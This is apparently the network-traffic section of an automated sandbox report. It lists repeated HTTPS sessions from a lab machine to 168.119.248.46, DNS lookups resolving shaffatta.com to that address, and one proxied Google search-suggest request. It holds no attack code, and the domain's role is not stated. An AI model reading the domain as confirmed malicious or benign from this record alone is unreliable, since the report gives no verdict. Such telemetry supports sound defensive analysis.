May 3, 2024 02:08:54.833395958 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.833786964 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.833800077 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.189965963 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.190138102 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.190696955 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.190721035 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.190875053 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.190882921 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.190932035 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.190937996 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.666017056 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.666100025 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.666111946 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.666158915 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.666234016 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.666251898 CEST	443	49758	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.666275024 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.666296005 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.671833038 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.671864986 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:55.671942949 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.672199965 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:55.672209978 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.028673887 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.028846025 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:56.029521942 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:56.029531002 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.029712915 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:56.029721975 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.029743910 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:56.029752016 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.507715940 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.507834911 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:56.507854939 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:56.507882118 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.654679060 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.654714108 CEST	443	49759	168.119.248.46	192.168.2.5
May 3, 2024 02:08:57.654730082 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.654778004 CEST	49759	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.663355112 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.663387060 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:57.663454056 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.664486885 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:57.664501905 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.021290064 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.021487951 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.021843910 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.021856070 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.022049904 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.022056103 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.022083044 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.022089005 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.499551058 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.499603987 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.499620914 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.499636889 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.499676943 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.499697924 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.499844074 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.499859095 CEST	443	49760	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.499869108 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.499903917 CEST	49760	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.504944086 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.504972935 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.505095005 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.505326033 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.505337954 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.862240076 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.862481117 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.862926960 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.862937927 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.863101959 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.863106966 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:58.863157034 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:58.863162994 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.338639021 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.338727951 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.338741064 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.338778019 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.338784933 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.338815928 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.338820934 CEST	443	49761	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.338845968 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.338845968 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.338861942 CEST	49761	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.344683886 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.344721079 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.344808102 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.345026970 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.345041037 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.702945948 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.703006983 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.707139969 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.707151890 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.707314968 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.707320929 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:08:59.707355976 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:59.707360029 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.179547071 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.179712057 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.179827929 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.179867029 CEST	443	49762	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.179920912 CEST	49762	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.186320066 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.186351061 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.186436892 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.186702967 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.186718941 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.544212103 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.544306040 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.546010971 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.546020985 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.546272993 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:00.546430111 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.546816111 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.546905994 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:00.546927929 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.020422935 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.020518064 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.020586967 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.020602942 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.020729065 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.020750046 CEST	443	49763	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.020766973 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.020788908 CEST	49763	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.027055979 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.027102947 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.027187109 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.027455091 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.027471066 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.385632038 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.385770082 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.386307955 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.386323929 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.386490107 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.386497974 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.386533976 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.386538982 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.865267038 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.865334988 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.865391016 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.865428925 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.865483046 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.865499020 CEST	443	49764	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.865515947 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.865551949 CEST	49764	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.876225948 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.876270056 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:01.876346111 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.876609087 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:01.876624107 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.233575106 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.233737946 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.234343052 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.234349966 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.234533072 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.234538078 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.234572887 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.234577894 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.713100910 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.713180065 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.713202000 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.713243008 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.713287115 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.713304043 CEST	443	49765	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.713315964 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.713362932 CEST	49765	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.719343901 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.719373941 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:02.719449997 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.719767094 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:02.719774961 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.076080084 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.076181889 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.076678991 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.076684952 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.076878071 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.076881886 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.076934099 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.076937914 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.557280064 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.557348013 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.557385921 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.557445049 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.581198931 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.581238031 CEST	443	49766	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.581257105 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.581283092 CEST	49766	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.586838961 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.586885929 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.586954117 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.587172985 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.587187052 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.946746111 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.946916103 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.947515965 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.947525978 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.947812080 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.947817087 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:03.947868109 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:03.947873116 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.424894094 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.424972057 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.424987078 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.425034046 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.425097942 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.425112963 CEST	443	49767	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.425127029 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.425157070 CEST	49767	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.496766090 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.496810913 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.496898890 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.497210979 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.497226000 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.858120918 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.858201981 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.859214067 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.859222889 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.859383106 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.859386921 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:04.859436035 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:04.859440088 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:05.334971905 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:05.335028887 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:05.335050106 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:05.335062981 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:05.335104942 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:07.793417931 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:07.793454885 CEST	443	49768	168.119.248.46	192.168.2.5
May 3, 2024 02:09:07.793468952 CEST	49768	443	192.168.2.5	168.119.248.46
May 3, 2024 02:09:07.793507099 CEST	49768	443	192.168.2.5	168.119.248.46

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2024 02:07:06.111351967 CEST	53	52332	1.1.1.1	192.168.2.5
May 3, 2024 02:07:06.144561052 CEST	52514	53	192.168.2.5	1.1.1.1
May 3, 2024 02:07:06.144730091 CEST	64763	53	192.168.2.5	1.1.1.1
May 3, 2024 02:07:06.231611013 CEST	53	64875	1.1.1.1	192.168.2.5
May 3, 2024 02:07:06.236514091 CEST	53	52514	1.1.1.1	192.168.2.5
May 3, 2024 02:07:06.236527920 CEST	53	64763	1.1.1.1	192.168.2.5
May 3, 2024 02:07:08.383913040 CEST	53	59471	1.1.1.1	192.168.2.5
May 3, 2024 02:07:27.784996986 CEST	53	57310	1.1.1.1	192.168.2.5
May 3, 2024 02:07:48.537352085 CEST	53	49488	1.1.1.1	192.168.2.5
May 3, 2024 02:08:06.082257986 CEST	53	56714	1.1.1.1	192.168.2.5
May 3, 2024 02:08:10.942714930 CEST	53	65440	1.1.1.1	192.168.2.5
May 3, 2024 02:08:22.878483057 CEST	50342	53	192.168.2.5	1.1.1.1
May 3, 2024 02:08:23.122062922 CEST	53	50342	1.1.1.1	192.168.2.5
May 3, 2024 02:08:33.941121101 CEST	53	50767	1.1.1.1	192.168.2.5
May 3, 2024 02:08:48.963745117 CEST	49424	53	192.168.2.5	1.1.1.1
May 3, 2024 02:08:49.243899107 CEST	53	49424	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 3, 2024 02:07:06.144561052 CEST	192.168.2.5	1.1.1.1	0xbd7e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 3, 2024 02:07:06.144730091 CEST	192.168.2.5	1.1.1.1	0xd611	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 3, 2024 02:08:22.878483057 CEST	192.168.2.5	1.1.1.1	0xead8	Standard query (0)	shaffatta.com	A (IP address)	IN (0x0001)	false
May 3, 2024 02:08:48.963745117 CEST	192.168.2.5	1.1.1.1	0x34c0	Standard query (0)	shaffatta.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
May 3, 2024 02:07:06.236514091 CEST	1.1.1.1	192.168.2.5	0xbd7e	No error (0)	www.google.com	142.250.176.196	A (IP address)	IN (0x0001)	false
May 3, 2024 02:07:06.236527920 CEST	1.1.1.1	192.168.2.5	0xd611	No error (0)	www.google.com		65	IN (0x0001)	false
May 3, 2024 02:08:23.122062922 CEST	1.1.1.1	192.168.2.5	0xead8	No error (0)	shaffatta.com	168.119.248.46	A (IP address)	IN (0x0001)	false
May 3, 2024 02:08:49.243899107 CEST	1.1.1.1	192.168.2.5	0x34c0	No error (0)	shaffatta.com	168.119.248.46	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.google.com

fs.microsoft.com

slscr.update.microsoft.com

https:

www.bing.com

shaffatta.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	142.250.176.196	443	2220	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:07:06 UTC	615	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-03 00:07:06 UTC	1191	IN	HTTP/1.1 200 OK Date: Fri, 03 May 2024 00:07:06 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-mGpH-Znomf7uFDK3yGiQXg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-03 00:07:06 UTC	64	IN	Data Raw: 36 64 34 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 6d 69 74 65 20 32 20 61 6c 70 68 61 20 74 65 73 74 22 2c 22 72 61 72 65 20 62 69 72 64 20 73 69 67 68 74 69 6e 67 22 2c 22 73 74 61 72 62 75 Data Ascii: 6d4)]}'["",["smite 2 alpha test","rare bird sighting","starbu
2024-05-03 00:07:06 UTC	1255	IN	Data Raw: 63 6b 73 20 62 6f 67 6f 20 64 72 69 6e 6b 73 22 2c 22 6c 65 61 76 65 20 6e 6f 20 6d 61 6e 20 62 65 68 69 6e 64 20 67 72 61 79 20 7a 6f 6e 65 20 77 61 72 66 61 72 65 22 2c 22 6d 6c 62 20 63 75 62 73 20 6d 65 74 73 22 2c 22 73 61 6e 20 6a 61 63 69 6e 74 6f 20 72 69 76 65 72 20 66 6c 6f 6f 64 69 6e 67 20 63 6f 6e 72 6f 65 22 2c 22 76 61 6e 64 65 72 70 75 6d 70 20 72 75 6c 65 73 22 2c 22 64 61 6d 6f 6e 69 63 20 77 69 6c 6c 69 61 6d 73 20 74 72 61 6e 73 66 65 72 20 70 6f 72 74 61 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 Data Ascii: cks bogo drinks","leave no man behind gray zone warfare","mlb cubs mets","san jacinto river flooding conroe","vanderpump rules","damonic williams transfer portal"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsi
2024-05-03 00:07:06 UTC	436	IN	Data Raw: 33 51 55 4a 32 54 6b 4e 73 64 55 70 56 4d 55 39 59 55 31 46 57 53 45 70 56 4f 48 64 4e 51 54 42 69 63 55 78 44 55 6b 4e 4d 61 47 67 35 55 48 6b 7a 53 47 4a 49 54 46 70 6d 53 6b 68 46 53 6b 70 76 57 6a 51 78 5a 69 39 42 52 7a 56 49 61 55 6c 54 56 44 56 49 4f 54 6b 34 57 47 52 61 55 33 70 52 56 55 56 56 57 6c 6c 55 62 55 46 6a 65 57 78 6c 53 43 39 72 61 47 52 79 53 48 52 6c 4e 47 5a 7a 5a 48 68 78 59 6e 68 6f 4d 58 68 33 61 55 70 33 4d 55 68 43 54 45 70 4e 56 6e 41 30 64 7a 68 54 64 6b 64 6e 51 6e 4e 52 62 31 67 79 63 30 51 76 54 33 64 50 59 55 38 77 5a 6d 6c 34 59 57 78 4b 55 46 56 36 51 32 35 35 64 57 39 79 53 6d 46 58 62 6e 42 5a 62 57 78 74 61 31 45 79 56 6d 56 32 4d 7a 4a 48 53 6e 52 57 64 7a 46 74 54 6b 46 72 61 6c 5a 73 53 6b 70 47 65 53 39 32 59 57 Data Ascii: 3QUJ2TkNsdUpVMU9YU1FWSEpVOHdNQTBicUxDUkNMaGg5UHkzSGJITFpmSkhFSkpvWjQxZi9BRzVIaUlTVDVIOTk4WGRaU3pRVUVVWllUbUFjeWxlSC9raGRySHRlNGZzZHhxYnhoMXh3aUp3MUhCTEpNVnA0dzhTdkdnQnNRb1gyc0QvT3dPYU8wZml4YWxKUFV6Q255dW9ySmFXbnBZbWxta1EyVmV2MzJHSnRWdzFtTkFralZsSkpGeS92YW
2024-05-03 00:07:06 UTC	93	IN	Data Raw: 35 37 0d 0a 6c 6c 54 62 56 4a 79 56 31 5a 55 64 46 6c 6b 56 47 4e 70 4c 7a 42 48 53 32 46 76 61 6d 35 77 65 44 6c 74 62 46 6c 48 54 57 35 56 64 57 73 7a 56 53 39 33 51 54 68 49 51 6e 4e 73 55 31 55 7a 65 6c 42 6c 57 6b 4e 52 63 6b 70 48 4e 57 70 56 56 30 31 74 62 54 52 32 0d 0a Data Ascii: 57llTbVJyV1ZUdFlkVGNpLzBHS2Fvam5weDltbFlHTW5VdWszVS93QThIQnNsU1UzelBlWkNRckpHNWpVV01tbTR2
